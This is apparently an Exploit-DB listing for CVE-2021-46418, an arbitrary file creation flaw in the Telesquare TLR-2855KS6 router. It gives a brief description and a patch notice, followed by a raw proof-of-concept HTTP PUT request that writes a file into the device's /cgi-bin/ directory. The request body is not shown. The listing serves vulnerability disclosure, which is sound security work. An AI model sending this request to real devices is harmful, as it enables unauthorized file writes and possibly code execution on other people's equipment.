header-logo
Suggest Exploit
vendor:
TLR-2855KS6
by:
Momen Eldawakhly (Cyber Guy)
7.5
CVSS
HIGH
Arbitrary File Creation
264
CWE
Product Name: TLR-2855KS6
Affected Version From: TLR-2855KS6
Affected Version To: TLR-2855KS6
Patch Exists: YES
Related CWE: CVE-2021-46418
CPE: h:telesquare:tlr-2855ks6
Metasploit:
Other Scripts:
Platforms Tested: Linux [Firefox]
2022

Telesquare TLR-2855KS6 – Arbitrary File Creation

An arbitrary file creation vulnerability exists in Telesquare TLR-2855KS6. An attacker can send a specially crafted HTTP request to the vulnerable device to create a file with arbitrary content. This could allow an attacker to gain access to the device and execute malicious code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their devices to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.telesquare.co.kr/
# Version: TLR-2855KS6
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46418

# Proof of Concept

PUT /cgi-bin/testing_cve.txt HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: nonce=1642692359833588
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32